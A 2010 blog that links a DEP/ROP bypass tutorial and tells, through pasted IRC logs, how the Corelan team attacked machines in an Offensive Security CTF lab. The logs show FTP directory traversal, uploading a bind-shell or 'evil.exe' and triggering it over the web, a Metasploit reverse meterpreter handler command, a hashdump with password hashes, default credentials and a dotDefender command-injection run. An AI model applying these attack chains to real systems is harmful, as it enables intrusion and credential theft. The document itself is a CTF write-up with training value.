mardi 8 juin 2010

Bypassing DEP with WPM & ROP

Hi,
I won't be very long for the introduction, just to say that i just made my first tutorial and it's about bypassing DEP using ROP and WPM technique, the tutorial was written in may and kept private for the corelan team members since the exploit goes public on June 07th.

I's a case study of the Audio Converter Software ad how to build a reliable exploit to bypass DEP, hope you will like it (PS: the paper is in PDF format).

Download link 1

mercredi 12 mai 2010

CHAPTER 03 : GhostBusters

CHAPTER 03 / Part 01 : You said GHOST ????

Now lets move to the last machine, the devil's machine called GHOST, with same enthusiasm, bravour, with no tiredness and no fear the warriors keeped moving forward :


[01:37] <@corelanc0d3r> focus focus
[01:37] <@corelanc0d3r> yep
[01:38] <@mr_me> ok what is the next target
[01:38] <@mr_me> lets go guys
[01:38] <@TecR0c> 6.68
[01:38] <@TecR0c> it is running php
[01:38] <@_sinn3r> ok, let's try 6.68
[01:39] <@_sinn3r> meh, only HTTP open
[01:39] <@TecR0c> http://192.168.6.68/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
[01:39] <@Lincoln> lol
[01:39] <@Lincoln> i wonder if they notice
[01:39] <@TecR0c> so its got php credits
[01:39] <@mr_me> php
[01:39] <@Lincoln> that all of us get multiple points
[01:39] <@Lincoln> at the same time
[01:39] <@TecR0c> who cares
[01:39] <@TecR0c> \
[01:39] <@TecR0c> =]
[01:39] <@Lincoln> hehe
[01:39] <@TecR0c> lets win !
[01:40] <@Lincoln> yes!

But faced to the psychotic power of the GHOST they got a little bit confused at the beginning :

[01:41] <@_sinn3r> Is the web app actually a PHP, or ASP?
[01:41] <@_sinn3r> I'm seeing login.asp
[01:41] <@mr_me> asp
[01:41] <@mr_me> but php is install
[01:41] <@_sinn3r> gotcha
[01:41] <@TecR0c> it is IIS
[01:41] <@_sinn3r> rick2600: we're doing the offsec ctf, currently in phase 2.
[01:42] <@_sinn3r> past the noob filter
[01:42] <@TecR0c> microsoft
[01:43] <@_sinn3r> hmmm 6.68 isn't responding atm
[01:43] <@TecR0c> http://192.168.6.66/Sites/Knowledge/Membership/Inspired/ViewCode.asp
[01:44] <@rick2600> cool...
[01:44] <@TecR0c> the vuln was patched in 2003
[01:44] <@TecR0c> ;/
[01:45] <@_sinn3r> http://192.168.6.68/asdfasdf
[01:45] <@_sinn3r> haha... wtf
[01:46] <@TecR0c> yep
[01:46] <@TecR0c> private you will get
[01:46] <@TecR0c> if the file doesn't exist
[01:46] <@_sinn3r> si
[01:47] <@mr_me> guys
[01:47] <@mr_me> check this out
[01:48] <@TecR0c> pattern
[01:48] <@mr_me> http://192.168.6.68/test.asp?source=../../
[01:48] <@_sinn3r> huh.......
[01:48] <@mr_me> some dodgy stuff here
[01:48] <@Lincoln> rolf
[01:48] <@Lincoln> that looks like my cat

However nothing stopped them and _sinn3r found a tresor of the GHOST :

[01:48] <@TecR0c> if you go ../ up and down
[01:48] <@TecR0c> you will see
[01:48] <@TecR0c> i think this is a big clue
[01:48] <@mr_me> it changes
[01:48] <@_sinn3r> I see a butt
[01:49] <@mr_me> right
[01:49] <@_sinn3r> i think it just changes randomly
[01:49] <@mr_me> keep transversing
[01:49] <@mr_me> really
[01:49] <@_sinn3r> when you see the butt image, see the html....
[01:49] <@_sinn3r> no pic code, no css
[01:50] <@mr_me> yeh
[01:50] <@mr_me> odd

after a little working on that machine, mr_me really understand what they are facing :

06[01:51] <~corelanc0d3r> try source=alert();
[01:52] <@_sinn3r> wait, there is javascript
[01:52] <@TecR0c> dont thinkn alert();
[01:52] <@TecR0c> is anything
[01:52] <@TecR0c> _sinn3r, where is the js ?
[01:53] <@_sinn3r> guys
[01:53] <@_sinn3r> wget 192.168.6.68/javascript
[01:53] <@corelanc0d3r> javascript is a file right ?
[01:53] <@_sinn3r> yes, a file
[01:53] <@TecR0c> oh hello
[01:53] <@TecR0c> lol
[01:53] <@corelanc0d3r> time for some reversing :D
[01:53] <@TecR0c> thats the code playing
[01:53] <@TecR0c> with the images !
[01:53] <@_sinn3r> yes
[01:54] <@mr_me> basterds

Now they started to use the massive destruction weapons

[02:04] <@TecR0c> got a udp scan ?
[02:04] <~corelanc0d3r> I'll do one
[02:05] <@TecR0c> thanks
[02:05] <@Lincoln> only checked this
[02:05] <@Lincoln> 161/udp closed snmp
[02:05] <@TecR0c> do you know how to test udp ports with nc ?
[02:05] <@corelanc0d3r> nope, I thought it was tcp only
[02:05] <@Lincoln> -u
[02:05] <@corelanc0d3r> not sure
[02:05] <@corelanc0d3r> -U ?
[02:05] <@corelanc0d3r> ok
[02:05] <@Lincoln> yes
[02:06] <@Lincoln> port scanning so slow, tried to do all 1-65535 will take until next year
[02:06] <@Lincoln> bet there is another service running on some port

At the same time, the great warrior corelanc0d3r started his mystic approach and found a first vuln in the GHOST:

[02:06] <@corelanc0d3r> haha http://192.168.6.66/1/%
[02:06] <@corelanc0d3r> bad ph33r
[02:06] <@corelanc0d3r> :D
[02:08] <@TecR0c> lol
[02:09] <@TecR0c> http://192.168.6.68/corelanteam/%
[02:09] <@TecR0c> ;)
[02:09] <@corelanc0d3r> lol
[02:09] <@corelanc0d3r> so they have some input validation
[02:09] <@corelanc0d3r> triggers on %

Unfortunately in the other dimention, some no fair action were taken against the team :

[02:12] <@corelanc0d3r> looks like some dude posted solution to phase1 in the HSIYF channel
[02:12] <@corelanc0d3r> wtf - that's not really fair
[02:12] <@Lincoln> aww lame
[02:13] <@TecR0c> ah
[02:13] <@mr_me> fukn hell
[02:13] <@mr_me> thats bad

After a UDP scan fight and an unseccessful snmp approach, Time to stop the machine, and start thinking, and that's the power of the team, thinking and sharing :

[02:28] <~corelanc0d3r> what is the difference between the index.asp page and /1/index.asp page ?
[02:28] <~corelanc0d3r> different post operations
[02:28] <~corelanc0d3r> differend field names
[02:28] <~corelanc0d3r> perhaps there's a bug where you can feed an asp page and make the app think it's an image
[02:28] <@chap0> one fake one real :D just guessing
[02:29] <@mr_me> ok possible path to execution
[02:29] <@mr_me> lets realli think
[02:29] <@mr_me> we dont have much on this one

But they really needed some rest, so they took a little time to play with a nice pirate picture :

[02:30] <@corelanc0d3r> was just playing with some url's
[02:30] <@corelanc0d3r> like this
[02:31] <@corelanc0d3r> http://192.168.6.66/index.asp/1/BBP.jpg
[02:31] <@corelanc0d3r> just playing

TecR0c and corelanc0d3r came with new and fresh idea as always, thinking out of the box is very important :

[02:33] <@TecR0c> we cracking those hashes ?
[02:33] <@TecR0c> maybe u need them to login
[02:33] <@corelanc0d3r> yeah good idea
[02:33] <@corelanc0d3r> machine1 : only one IP
[02:33] <@corelanc0d3r> dns servers on 192.168.6.1
[02:33] <@corelanc0d3r> zone transfers ?
[02:35] <@TecR0c> 192.168.64.2 i think is there dns server
[02:35] <@mr_me> sinn3r: you check the images?
[02:35] <@mr_me> _sinn3r*

Acting and thinking like hackers, every techniques was tried :

[02:49] <@TecR0c> maybe we need to do social engineering
[02:49] <@TecR0c> lolll
[02:49] <@TecR0c> anyone got muts numbe r?
[02:49] <@corelanc0d3r> haha we can PM him
[02:50] <@_sinn3r> I tried

A little bit of confusion came again :

[02:52] <@corelanc0d3r> are we sure this is a IIS server ?
[02:52] <@TecR0c> can we run fasttrack
[02:52] <@TecR0c> lol
[02:52] <@_sinn3r> it says Microsoft
[02:52] <@mr_me> yes
[02:52] <@corelanc0d3r> where does it say Microsoft ?
[02:53] <@mr_me> def iis
[02:53] <@TecR0c> yep
[02:53] <@mr_me> in the .asp extension :P
[02:53] <@_sinn3r> sniff it with wireshark, you'll see it.
[02:53] <@corelanc0d3r> no way they tried to make it look like IIS ?
[02:53] <@_sinn3r> possible
[02:53] <@corelanc0d3r> I mean could be vulnerable apache version
[02:53] <@mr_me> true
[02:53] <@corelanc0d3r> changed
[02:54] <@_sinn3r> "Server: Microsoft-IIS "
[02:54] <@corelanc0d3r> I can do that on Apache as well
[02:54] <@corelanc0d3r> mod_rewrite etc
[02:54] <@_sinn3r> yeah, I know...
[02:54] <@corelanc0d3r> the behaviour just looks like mod_rewrite to me
[02:54] <@mr_me> corelanc0d3r: ill try other os detectors
[02:55] <@corelanc0d3r> k
[02:55] <@TecR0c> http://192.168.6.67/Sites/
[02:55] <@TecR0c> says Microsoft IIS
[02:55] <@TecR0c> there
[02:55] <@Lincoln> im pilfering through .70 for anything, clues
[02:55] <@Lincoln> nada
[02:55] <@corelanc0d3r> yeah, again
[02:55] <@TecR0c> doesn't look that rela though
[02:55] <@corelanc0d3r> they could have tried hard to make it look like IIS

It's 03:07 AM when corelanc0d3r found finally a back door

[03:07] <@corelanc0d3r> the pic with the butt is some kind of door
[03:07] <@corelanc0d3r> it's a backdoor, but still a door
[03:07] <@corelanc0d3r> :D
[03:07] <@_sinn3r> ew
[03:07] <@Lincoln> rolf
[03:07] <@_sinn3r> noooooooooooo
[03:07] <@corelanc0d3r> yeah I know - bad joke
[03:07] <@_sinn3r> :-D
[03:07] <@_sinn3r> lol
[03:07] <@TecR0c> im not going to execute that
[03:07] <@TecR0c> ;/
[03:07] <@chap0> hahaha

After being desesperated the mystic corelanc0d3r remembred the team about corelan's team Slogan :

[03:13] <@corelanc0d3r> Corelan Slogan : Never underestimate the power of...
[03:13] <@corelanc0d3r> ummm..
[03:13] <@corelanc0d3r> ... underestimation ?

After searching on Apache exploits, ssl exploits, hidden modules vulnerability they started to talk in an uncomprehensible language :

[03:17] <@corelanc0d3r> what do you mean ?
[03:17] <@_sinn3r> i meant ":-p"
[03:17] <@_sinn3r> sorry
[03:17] <@corelanc0d3r> haha :D
[03:17] <@_sinn3r> lol
[03:17] <@corelanc0d3r> and sus = ?
[03:18] <@mr_me> sus peciaous
[03:18] <@corelanc0d3r> haha
[03:18] <@mr_me> suspecious
[03:18] <@corelanc0d3r> okido
[03:18] <@mr_me> yeh
[03:19] <@TecR0c> damn

To Be Continued ...

mardi 11 mai 2010

CHAPTER 02 : Killing the n00bKiller

Chapter 2 - PART 01 : Searching the graves

Entring to the VPN we had to fix our objectives and that's the speciality of TecR0c :

[18:32] <@TecR0c> the target is actually
[18:32] <@TecR0c> http://192.168.6.67/
[18:32] <@TecR0c> muahahaha
[18:33] <@Sud0> hahahaha
[18:33] <@Sud0> np
[18:33] <@Sud0> :)
[18:33] <@mr_me> nice brother
[18:33] <@TecR0c> we are gonna own this !

Some minutes later a bige silence was in the irc channel :

[18:39] <@Sud0> anyone here ?
[18:40] <@mr_me> we are here
[18:40] <@mr_me> just working
[18:40] <@mr_me> my freind
[18:40] <@mr_me> :)
[18:42] <@Sud0> though
[18:42] <@Sud0> i lost connection
[18:42] <@Sud0> nothing was mooving here :)

As i said before, TecR0c was expert to select targets, so we have to change target again ;)

[18:47] <@TecR0c> 71 72 are the same aswell
[18:48] <@Sud0> i saw it
[18:48] <@ekse> hi guys
[18:48] <@Sud0> hi ekse
[18:49] <@TecR0c> you can ftp to 192.168.6.70
[18:49] <@TecR0c> anonymous
[18:50] <@mr_me> ftp access
[18:50] <@TecR0c> yep it windows 7 utimate
[18:51] <@Sud0> yes
[18:51] <@TecR0c> i think its 64bit aswell
[18:51] <@Sud0> directory traversal
[18:51] <@Sud0> not working

Always following TechR0c, he want to use a new ROP technique :)

[18:51] <@TecR0c> lets do ROP
[18:51] <@TecR0c> lol
[18:52] <@Sud0> hahaha
[18:53] <@Sud0> @TecR0c alll suregemail are post auth exploit

Then mr_me arrived with a new fresh, sweet and technical ideas :)

[19:25] <@Sud0> hola mr_me
[19:26] <@mr_me> Sud0: hola
[19:26] <@mr_me> ok so im abit stumped
[19:26] <@Sud0> ssup ? :)
[19:26] <@Sud0> hahah
[19:27] <@Sud0> what's happening ?
[19:27] <@mr_me> 6.67 is just login prompt
[19:27] <@mr_me> prompts
[19:27] <@Sud0> hahahaha yes
[19:27] <@mr_me> and 6.70 webmail
[19:27] <@mr_me> duno yet
[19:27] <@Sud0> yup :)
[19:27] <@mr_me> i might bruteforce a pop account
[19:27] <@mr_me> or ftp
[19:27] <@mr_me> but duno any undernsmae
[19:27] <@mr_me> usernames**

After That TecR0c did an extraordinary discovery using his ROP technique

[19:36] <@TecR0c> wdf
[19:36] <@TecR0c> its linux box
[19:36] <@_sinn3r> are you guys playing w/ CTF at the moment?
[19:37] <@Sud0> @mr_me not vuln on that
[19:37] <@Sud0> yes _sinn3r and u ?
[19:37] <@_sinn3r> at the moment, no
[19:37] <@TecR0c> its ubuntu 8.10
[19:37] <@TecR0c> ;)
[19:37] <@Sud0> what IP TecR0c ?
[19:37] <@_sinn3r> kinda busy with exploit-db... lots of tickets.
[19:38] <@TecR0c> 71
[19:38] <@_sinn3r> I did hear it's pretty nasty... a couple guys at exploit-db were working on the CTF labs.
[19:38] <@TecR0c> ah
[19:38] <@TecR0c> wait
[19:38] <@TecR0c> lol
[19:38] <@TecR0c> its my machine hehe
[19:38] <@TecR0c> =]
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@TecR0c> got excited for one sec
[19:38] <@TecR0c> :P
[19:40] <@Sud0> héhé
[19:41] <@Sud0> 71 ---> vista ultimate ;)

After analysing the machine, we agreed to make a nice plan :

[20:51] <@Sud0> @tecR0c 21 -------------> should be vuln to directory traversal
[20:52] <@TecR0c> so what we need to do ?
[20:52] <@Sud0> 1- got a directory traversal
[20:52] <@Sud0> here is the scenario
[20:53] <@Sud0> 1- directory traversal on Complete FTP
[20:53] <@Sud0> 2- Get an account on webmail
[20:53] <@Sud0> 3- use a remote exploit against webmail to get root (i ment shell)
[20:53] <@Sud0> 4- use a local root exploit against qualcomm popassd
[20:53] <@Sud0> got it ?
[20:53] <@mr_me> yeh
[20:54] <@mr_me> qualcom
[20:54] <@mr_me> we knew
[20:54] <@TecR0c> cool
[20:54] <@TecR0c> ok lets make this happenn

After 06 Hour of trying a Directory traversal as anonymous against machine 70 without success Lincoln came to save us :

[23:30] <@corelanc0d3r> doing full scan
[23:30] <@Lincoln> cd \..\..\
[23:31] <@Sud0> @Lincoln : not working with me
[23:31] <@Sud0> i tested it 10000 times
[23:32] <@Sud0> @Lincoln don't work cd \..\..\
[23:32] <@Lincoln> ftp> pwd
[23:32] <@Lincoln> 257 "/MyDocuments" is current directory.
[23:32] <@Lincoln> ftp> ls
[23:32] <@Lincoln> 200 PORT command successful.
[23:32] <@Lincoln> 150 Opening ASCII mode data connection for listing
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Music
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Pictures
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Videos
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 08 00:03 test
[23:32] <@Lincoln> 226 Transfer complete.
[23:32] <@Sud0> shit
[23:32] <@Lincoln> ftp> cd \..\..\

Lincoln explained us the problem, TecR0c finished it with a nice phrase

[23:35] <@Sud0> devil
[23:35] <@_sinn3r> I still can't get noobSeccret.txt.......... the damn thing just times out.
[23:35] <@Sud0> what pass ?
[23:35] <@Lincoln> killthen00b
[23:35] <@chap0> I mentioned it earlier but
[23:35] <@chap0> hahaha
[23:35] <@chap0> it was on the page they said to read the whole page
[23:35] <@chap0> haha
[23:35] <@chap0> :D
[23:35] <@chap0> anyway good going linc for bringing it to the light!
[23:35] <@_sinn3r> "Gateway Time-out
[23:35] <@_sinn3r> The gateway did not receive a timely response from the upstream server or application."
[23:36] <@Sud0> nice lol
[23:36] <@Sud0> where on the websitre Lincoln lol
[23:36] <@Lincoln> FTP Credentials are : devil / killthen00b
[23:36] <@Lincoln> under helpful hints on the bottom
[23:36] <@Lincoln> of info blog
[23:36] <@Sud0> hahahahaha
[23:37] <@Sud0> i'm so umb
[23:37] <@Sud0> i dumb
[23:37] <@Sud0> lol
[23:37] <@TecR0c> WTF

After a team work we discovered the default exe folder of surgemail to put our backdoor

[00:11] <@Lincoln> try cd /MyDocuments/....../....../....../..../....../surgemail/web
[00:11] <@TecR0c> 07 23:52:18.13:1876: IMAP 3.8k4-4, User connected (192.168.6.143) (192.168.6.71) socket=1588
[00:11] <@TecR0c> ok so the peolpe who have owned it must have to use imap aswell
[00:11] <@TecR0c> ;/
[00:17] <@Sud0> CGI did not respond correctly, it probably exited abnormally or the file may not exist or have +x access (bind.exe) ()
[00:18] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:21] <@mr_me> hey sudo
[00:21] <@mr_me> u have web root
[00:21] <@mr_me> ?
[00:22] <@_sinn3r> you think 192.168.6.72 supports ASP?
[00:22] <@_sinn3r> server: DManager........
[00:23] <@_sinn3r> nnnnnoope...
[00:23] <@Sud0> hum
[00:23] <@Sud0> yes
[00:23] <@Sud0> shit
[00:23] <@Sud0> but
[00:23] <@Sud0> i loaded
[00:23] <@Sud0> the exe
[00:23] <@Sud0> bind.exe
[00:23] <@Lincoln> yeah i missed that one lol
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:23] <@Lincoln> http://192.168.6.72/evil.html
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:24] <@_sinn3r> bindshell for what port?
[00:24] <@Sud0> 4444

09/05/2010 :

A new day and corelanc0d3r started thinking about new technologies and doing what he loves best : writing nice articles and blogs

[00:31] <@corelanc0d3r> trying some stuff
[00:31] <@corelanc0d3r> but
[00:31] <@corelanc0d3r> perhaps this may help
[00:31] <@corelanc0d3r> go to the admin page of surgemail
[00:31] <@corelanc0d3r> log in with admin account
[00:31] <@corelanc0d3r> corelanc0d3r
[00:31] <@corelanc0d3r> password
[00:31] <@corelanc0d3r> admimn
[00:31] <@corelanc0d3r> admin
[00:31] <@corelanc0d3r> you can create blogs
[00:32] <@corelanc0d3r> maybe we can do something with this

[00:33] <@corelanc0d3r> http://192.168.6.70/blogs/corelanc0d3r
[00:34] <@corelanc0d3r> hahaha

After That Lincoln gave us a nice shell :

[00:46] <@Lincoln> CAN YOU SAY WOOT
[00:46] <@Lincoln> msf exploit(mhandler) > exploit
[00:46] <@Lincoln> [*] Started reverse handler on 192.168.6.135:4444
[00:46] <@Lincoln> [*] Starting the payload handler...
[00:46] <@Lincoln> [*] Sending stage (748032 bytes) to 192.168.6.135
[00:46] <@Lincoln> [*] Meterpreter session 1 opened (192.168.6.135:4444 -> 192.168.6.135:44382)
[00:46] <@_sinn3r> whoa, how?
[00:46] <@corelanc0d3r> wtf
[00:46] <@corelanc0d3r> :D
[00:46] <@_sinn3r> how?
[00:47] <@TecR0c> wtf
[00:47] <@TecR0c> ohyeeeeee
[00:47] <@mr_me> fukn hell
[00:47] <@TecR0c> your the man
[00:47] <@TecR0c> =]
[00:47] <@_sinn3r> how how how how how
[00:47] <@chap0> lol
[00:47] <@mr_me> WOW

But it was not as nice as it looks like :

[00:48] <@Lincoln> ignore it guys
[00:48] <@Lincoln> no
[00:48] <@Lincoln> no
[00:48] <@Lincoln> i fucked up
[00:48] <@Lincoln> hahahaha
[00:48] <@corelanc0d3r> not worky ?
[00:48] <@Sud0> hahaha
[00:48] <@Sud0> :)
[00:48] <@Lincoln> no....
[00:48] <@Lincoln> too stupid to admit
[00:48] <@Lincoln> sorry guys ignore
[00:48] <@Sud0> your own machine
[00:48] <@Sud0> :)
[00:48] <@Lincoln> yep....
[00:48] <@Lincoln> hahahah
[00:48] <@_sinn3r> awwwwwwwwww......
[00:48] <@Lincoln> im sorry
[00:48] <@Lincoln> lol
[00:48] <@_sinn3r> :-)
[00:49] <@Lincoln> <------------- SUPER emabarrased After i was disconnected, with my unsuccessful bind shell, the team continue to work on killthen00b machine (one man can't make a team) there was a shell

[01:02] <@corelanc0d3r> ok - need a little help here
[01:02] <@corelanc0d3r> how do I set up metasploit
[01:02] <@corelanc0d3r> to listen for a reverse incoming meterpreter session
[01:02] <@corelanc0d3r> on let's say port 5555
[01:02] <@TecR0c> multi/handler
[01:03] <@TecR0c> use multi/handler
[01:03] <@TecR0c> show options
[01:03] <@_sinn3r> ./msfcli multi/handler payload=windows/meterpreter_reverse_tcp lhost=[your ip] lport=5555 E
[01:04] <@corelanc0d3r> failed Payload has not been selected
[01:04] <@_sinn3r> windows/meterpreter/reverse_tcp
[01:06] <@corelanc0d3r> reverting box again ?
[01:06] <@_sinn3r> two more people just got 50 pts......
[01:11] <@corelanc0d3r> bloody hell
[01:11] <@corelanc0d3r> rooted .70
[01:11] <@_sinn3r> how?
[01:11] <@corelanc0d3r> simple
[01:11] <@corelanc0d3r> really simple
[01:11] <@corelanc0d3r> ftp traversal
[01:11] <@corelanc0d3r> go to c:\surgemail\scripts
[01:11] <@corelanc0d3r> upload eveil
[01:11] <@corelanc0d3r> evil exe
[01:11] <@corelanc0d3r> call it from browserr
[01:11] <@corelanc0d3r> done

Here we are, using meterpreter, one of the glorius warriors opened a remote desktop

[01:21] <@_sinn3r> ok mr_me
[01:21] <@_sinn3r> do this
[01:21] <@_sinn3r> rdesktop 192.168.6.70
[01:21] <@_sinn3r> username: sinn3r
[01:21] <@_sinn3r> password: veryphat
[01:21] <@mr_me> woot
[01:21] <@mr_me> shell
[01:22] <@Lincoln> ahh sexy
[01:22] <@Lincoln> meterpreter > run hashdump
[01:22] <@Lincoln> [*] Obtaining the boot key...
[01:22] <@Lincoln> [*] Calculating the hboot key using SYSKEY 8cbc4040791fac141f35cba5f197d50f...
[01:22] <@Lincoln> [*] Obtaining the user list and keys...
[01:22] <@Lincoln> [*] Decrypting user keys...
[01:22] <@Lincoln> [*] Dumping password hashes...
[01:22] <@Lincoln> Administrator:500:aad3b435b51404eeaad3b435b51404ee:07eaa2b600669980aa3268fd8cc3f0e5:::
[01:22] <@Lincoln> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[01:22] <@Lincoln> devil:1001:aad3b435b51404eeaad3b435b51404ee:3cc3bac4b37e26d8208469533c59e2c6:::
[01:22] <@Lincoln> sinn3r:1002:aad3b435b51404eeaad3b435b51404ee:05597a07ce55307b3e6a3bd1a7abe12d:::
[01:22] <@Lincoln> going to run those through offsec cracker

And finally they got the beast down

[01:28] <@_sinn3r> I don't see a proof.txt in devil's desktop
[01:28] <@_sinn3r> Peter, what am I supped to look for?
[01:30] <@_sinn3r> ?
[01:30] <@corelanc0d3r> Administrators Desktop
[01:30] <@_sinn3r> ok... damn, just the wrong desktop
[01:30] <@Lincoln> can someone rehit evil.exe
[01:30] <@Lincoln> on .70
[01:30] <@_sinn3r> hit
[01:30] <@Lincoln> thanks
[01:32] <@Lincoln> doh
[01:32] <@Lincoln> no tftp on win7
[01:32] <@Lincoln> thats right
[01:32] <@_sinn3r> you need to manually enable it
[01:32] <@Lincoln> sinner you still on rdp?
[01:32] <@_sinn3r> not anymore. go ahead.
[01:33] <@_sinn3r> meterpreter > cat proof.txt
[01:33] <@_sinn3r> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> oO rolf
[01:34] <@corelanc0d3r> does anyone know if there is only one proof file per machine ?
[01:34] <@Lincoln> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> k got it
[01:34] <@_sinn3r> woohoo 50 pts
[01:35] <@corelanc0d3r> nicey

CHAPTER 01 : 08-05-2010 --> VS n00bFilter

Hey,
Here we are, we have to pass the n00bfilter as we are not n00b :-)

08/05/2010 ---> there was a little confusion in the beginning about the noob filter

[16:00] <@Sud0> none of the filter web page opens :(

[16:01] <@Sud0> http://www1.noob-filter.com / http://www2.noob-filter.com

[16:01] <@Sud0> not working both of the m:(

[06[16:01] <~corelanc0d3r> too much traffic ?

[16:01] <@TecR0c> they are working for me and mr_me

[16:01] <@Sud0> maybe yeah

[16:02] <@Sud0> nope for me not working :'(

[16:02] <@corelanc0d3r> @Tec : any luck with the noob filter ?

[16:02] <@TecR0c> not yet

[16:03] <@TecR0c> ill let you know

[16:03] <@TecR0c> if we get passed it

[16:03] <~corelanc0d3r> k
[16:06] <@TecR0c> hrm

[16:06] <@TecR0c> seems like noob-filter only works with iexplorer

[16:07] <@corelanc0d3r> ok what do we need to do ?

[16:10] <@TecR0c> working with firefox now

[16:10] <@TecR0c> all good


some time later, we got the dot defender key and that's what it looks like (general panic):

[16:21] <@Sud0> anyone here ?

[16:22] <@chap0> yo

[16:22] <@corelanc0d3r> yo

[16:22] <@corelanc0d3r> and ?

[16:23] <@Sud0> i found

[16:23] <@Sud0> http://www1........ /dotdefender

[16:23] <@corelanc0d3r> yeah

[16:23] <@corelanc0d3r> I'm trying the exploit for it

[16:23] <@corelanc0d3r> http://www.exploit-db.com/exploits/10261


but with no success at the beginning (mr_me just arrived ):

[16:24] * mr_me (mr_me@hidden-8B8DC393.lnk.telstra.net) has joined #corelan

[16:24] * corelanOp sets mode: +o mr_me

[16:24] <@Sud0> just tried it

[16:24] <@mr_me> whats the exploit

[16:24] <@TecR0c> does it work ?

[16:24] <@corelanc0d3r> no

[16:24] <@corelanc0d3r> don't think so

[16:24] <@corelanc0d3r> any other services on that server ?

[16:25] <@Sud0> not working

[16:25] <@Sud0> tried it

[16:25] <@Sud0> The Site Management application of dotDefender is reachable as a web

[16:25] <@Sud0> application (https:site/dotDefender/)

[16:25] <@Sud0> on the webserver. After passing the Basic Auth login you can

[16:25] <@Sud0> create/delete applications.

[16:25] <@Sud0> The mentioned vulnerability is in the 'deletesite' implementation and

[16:25] <@Sud0> the 'deletesitename' variable.

[16:25] <@Sud0> Insufficient input validation allows an attacker to inject arbitrary commands.

[16:25] <@Sud0>

[16:25] <@Sud0> we have to pass the basic auth before


Next Step guetting the authentication credentials (due to excitation, chap0 needed three retries so he could write w00t):

[16:29] <@mr_me> we def know the login is admin

[16:29] <@TecR0c> i can confirm that it is admin aswell

[16:29] <@TecR0c> password defined previously

[16:29] <@TecR0c> ;/

[16:29] <@TecR0c> im looking at the installatoin guide

[16:29] <@corelanc0d3r> not sure - it's not because the login says it's admin, that it is admin

[16:29] <@corelanc0d3r> ah ok

[16:29] <@corelanc0d3r> what is the default pass ?

[16:29] <@mr_me> looking for it atm

[16:29] <@TecR0c> doesn't look like there is a default password

[16:29] <@Sud0> found it guys

[16:29] <@Sud0> we have noob1

[16:29] <@Sud0> :d

[16:30] <@Sud0> hahahahahahahahahahahahahahahaha

[16:30] <@Sud0> guys

[16:30] <@Sud0> listen

[16:30] <@Sud0> @corelanc0d3r

[16:30] <@mr_me> i gotr

[16:30] <@mr_me> haha

[16:30] <@Sud0> @mr_me

[16:30] <@mr_me> i logged in

[16:30] <@Sud0> password

[16:30] <@chap0> all ears big ones

[16:30] <@mr_me> hahaha

[16:30] <@Sud0> admin/password

[16:30] <@mr_me> yeh

[16:30] <@chap0> W))T!

[16:30] <@chap0> w001

[16:30] <@chap0> w00t!

[16:30] <@chap0> sry

[16:30] <@chap0> hehehe

[16:30] <@TecR0c> ah

[16:30] <@TecR0c> timing out

[16:30] <@mr_me> its not root

[16:30] <@mr_me> woot nothing

[16:30] <@corelanc0d3r> so - dotdefender password ?

[16:30] <@corelanc0d3r> or just page login ?

[16:30] <@mr_me> admin:password

[16:31] <@mr_me> haha

[16:31] <@TecR0c> ok no one has passed phase 1 yet

[16:31] <@Sud0> admin/password



Then a lot of suspens take a look (mr_me though he was one of apollo staff having issue in space and calling nasa):

[16:32] <@mr_me> we are having issues here

[16:32] <@mr_me> its very slow access

[16:32] <@mr_me> yes

[16:32] <@chap0> si i agree forever and a day to get in

[16:32] <@TecR0c> Lincoln, http://www2.noob-filter.com/dotdefender/index.cgi

[16:32] <@Lincoln> ah k

[16:33] <@Sud0> yes

[16:33] <@Sud0> very slow

[16:33] <@Sud0> i built the header

[16:33] <@Sud0> and executing the command

[16:33] <@Sud0> using the exploit

[16:33] <@Sud0> but problem

[16:33] <@Sud0> very slow

[16:33] <@chap0> my page is still loading

[16:33] <@chap0> :/

[16:33] <@mr_me> me 2

[16:33] <@mr_me> what the

[16:34] <@chap0> waht happen?

[16:34] <@corelanc0d3r> someone DoS'ed it ?

The next minutes some of us are becomin a little bit paranos about user agent

[16:39] <@mr_me> i have the evil RCE request

[16:40] <@mr_me> but its way to slow

[16:40] <@mr_me> the server

[16:40] <@mr_me> this is a joke

[16:40] <@corelanc0d3r> yeah didn't scale very well

[16:41] <@Sud0> waiting result of my ls-als

[16:42] <@mr_me> ok it looks like its ment to be slow

[16:42] <@mr_me> thats the hint i get from muts

[16:42] <@corelanc0d3r> try just catting the file

[16:42] <@corelanc0d3r> from root

[16:42] <@corelanc0d3r> or from current folder

[16:42] <@corelanc0d3r> may be faster

[16:43] <@Sud0> yes

[16:44] <@Sud0> just waiting the page to be loaded

[16:44] <@Sud0> mr_me ---> ment to be slow ?.??????????????

[16:44] <@mr_me> well

[16:45] <@mr_me> i think maybe we change the user agent

[16:46] <@corelanc0d3r> yeah I'll try

[16:46] <@corelanc0d3r> I'll change it to Corelan Team


finally one of us got access to the dotdefender admin page and guess who ? (TecR0c)

[16:47] <@TecR0c> haha

[16:47] <@TecR0c> im in site management

[16:47] <@TecR0c> w00t

[16:47] <@chap0> good at least one of us is

[16:47] <@mr_me> doesnt load past that

[16:47] <@chap0> :D

[16:47] <@chap0> bla

[16:48] <@TecR0c> na still loading

[16:48] <@TecR0c> god damn

[16:49] <@mr_me> sudo

[16:49] <@mr_me> Sud0

[16:50] <@mr_me> did it load for u?

[16:50] <@mr_me> whats the response headers

[16:50] <@mr_me> paste em here


Then we finally could execute the first command on the server (id)

[16:50] <@mr_me> ok

[16:50] *Lincoln* hey

[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)

[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin

[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)

[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin

